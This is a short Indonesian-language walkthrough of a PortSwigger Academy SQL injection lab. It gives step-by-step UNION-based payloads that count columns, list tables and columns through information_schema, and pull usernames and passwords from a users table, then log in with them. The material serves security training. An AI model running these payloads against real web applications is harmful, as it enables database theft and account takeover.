Portswigger academy SQLi Lab: SQL injection attack, listing the database contents on non-Oracle databases

 


Kali ini kita akan mengambil isi database dari kerentanan SQL injection. Akan menggunakan beberapa trik dan payload yang sebelumnya. 

Gunakan ' untuk melihat kerentanannya. Selanjutnya jika sudah error, tulis payload: 

'order+by+1--

'order+by+2--

'order+by+3-- (error di 3, jumlah kolom ada 2)


Selanjutnya ketik:


'union+select+NULL,NULL--

'union+select+'a','a'--



Keduanya bisa mengembalikan string. 

Ambil muatan tabel pada databasenya menggunakan:

'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--


muncul list diatas, pilih yang berkaitan dengan username, akun atau pasword.

saya memilih:

users_dncaie


selanjutnya masukkan payload:

'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_dncaie'--


Akan muncul yang berhubungan dengan credential seperti username dan password:



Disini saya menemukan:

username_eygvsy

password_dtvays


Masukkan ke dalam payload:

'+UNION+SELECT+username_eygvsy,+password_dtvays+FROM+users_dncaie--


Kredensial yang kita butuhkan telah didapatkan. Selanjutnya login dengan kredensial tersebut.


Lab ini berhasil diselesaikan.






Komentar